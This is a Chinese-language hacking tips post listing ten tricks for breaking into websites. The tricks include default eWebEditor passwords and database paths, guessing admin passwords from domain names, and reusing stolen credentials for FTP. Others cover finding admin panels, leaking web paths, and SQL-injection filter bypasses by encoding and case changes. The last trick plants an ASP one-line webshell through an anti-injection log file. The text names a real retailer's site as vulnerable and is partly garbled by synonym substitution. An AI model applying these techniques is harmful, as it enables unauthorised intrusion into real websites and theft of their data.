总结网站友情检测一些技巧经验

1.例如：咱们的方针网址为“http://www.0dayhack.com/forum/index.php”那么咱们把地址改为http://www.0dayhack.com/forum/index.PHP后再阅读看看是不是存在页面，假如存在的话，则服务器所运用的体系为windows,假如显现不存在，则服务器很有也许运用的是Linux
2. Ewebeditor拿站的新窍门
Ewebeditor 咱们应该是再了解不过的吧？先用默许暗码admin888登入，不可就下载默许数据库‘/db/ewebeditor.mdb”，假如默许数据库也改了的话咱们是不是就该抛弃了呢？这儿通知咱们我的经历！即是用暗码admin999登入，或许输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的概率能拿下方针！
3. 社工的小窍门
在侵略的时分假如方针网站有论坛的话，咱们能够试一下社工，例如一个网站是“www.0dayhack.com”, 管理员称号为admin,那么咱们就能够试试用暗码“0dayhack”和“0dayhack.com”来登入，这种方法最适合在侵略大型公司网站的时分运用！
4. 侵略时的思维拓宽
有时分咱们获得了方针网站的管理员暗码，可是又找不到后台，这是能够试下用FTP登入，例如，方针网站是”www.0dayhack.com “ 得到的暗码为“bishi”，咱们就能够试下用“0dayhack”“0dayhack.com”www.0dayhack.com作为FTP 用户名，用“bishi”：作为FTP暗码来进行登入，成功的概率能够很大的哦！)
5. 侵略时获得管理员称号
有时分在侵略类似于新闻发布网的网站时，写入得到了管理员暗码，可是拿不到管理员的称号，网站上也没有论坛啥的，这时分该怎么办呢？咱们能够随意翻开一个新闻，然手细心找找比如“提交者”“发布者”之类的字眼，通常“提交者”即是管理员的称号了。:
6. 寻觅管理员后台
有时分咱们得到了管理员的账号和暗码，可是却苦于找不到后台。这时分咱们能够对着网站上的图像点右键，检查其特点。有时确实能找到后台的。
7 . 暴web绝对路径
尽人皆知，在侵略asp.net的网站时，咱们首要即是在aspx文件前加上一个“~”来测验暴出web的绝对路径，但在侵略用ASP+IIS架起的网站时能不能用呢？答案是必定的，可是有一定的窍门，假定方针网站的主页为 www.0dayhackx/index.asp，咱们能够测验提交这么的网址www.x0dayhack.com/fkbhvv.aspx ,其中fkbhvv.aspx 是不存在的！这个方法的成功率大约是%60. 家乐福的官方站就有这个缝隙
8. stm文件在侵略中的效果
当网站不允许上载 asp .. cer ..cdx . htr 等文件时，上载一个stm文件，代码为 “”(想检查啥文件就写啥文件名，这儿我假定想检查的文件名为”conn.asp”),，然后直接翻开这个 stm文件的地址，再检查源代码，“conn.asp”这个文件的代码就一览无遗了！
9. 写入的窍门
在找到一个网站也许存在打针缝隙的地址时（假定地址为www.0dayhackxx/news.asp?id=6）,咱们通常会先提交一个单引号“’”来测验是不是存在打针缝隙，但现在网上的通用防写入程序还是许多，所以很有也许会返回“XX通用防写入程序已阻挠你企图进行的进犯！”的写入此类音讯框。这时咱们除了能够测验COOKIES写入之外，还能够把变量编码一下（如”www.0dayhackx/news.asp?id=6”编程” www.0dayhack.com/news.asp%69%64=6”）来进行打针，不可的话能够变换一下大小写（如“id”成为“ID”），或许变换大小写后再编码来进行打针等，总之想一些方法来把变量弄怪点，许多通用防写入程序都存在这写被绕过的缺点！
10. 防写入程序拿shell
当你用单引号“’”来测验一个网站也许存在写入缝隙的地址时（假定网址为“www.0dayhack/news.asp?id=6”）弹出了“你的操作已被记载！”这类信息，而咱们又没方法去绕过防写入体系的时分，能够试着提交http://www.0dayhack/sqlin.asp看看存不存在“sqlin.asp” ，假如存在的话，咱们只需提交” http:// www.0dayhack/news.asp?id=6′<%execute request(“j”)%>“ ，然后再用一句话木马客户端来衔接http://www.0dayhackx/sqlin.asp文件就行了，由于现在许多通用防写入程序都是用”sqlin.asp“这个文件名来做不合法记载的数据库，并且大多数都没防下载处理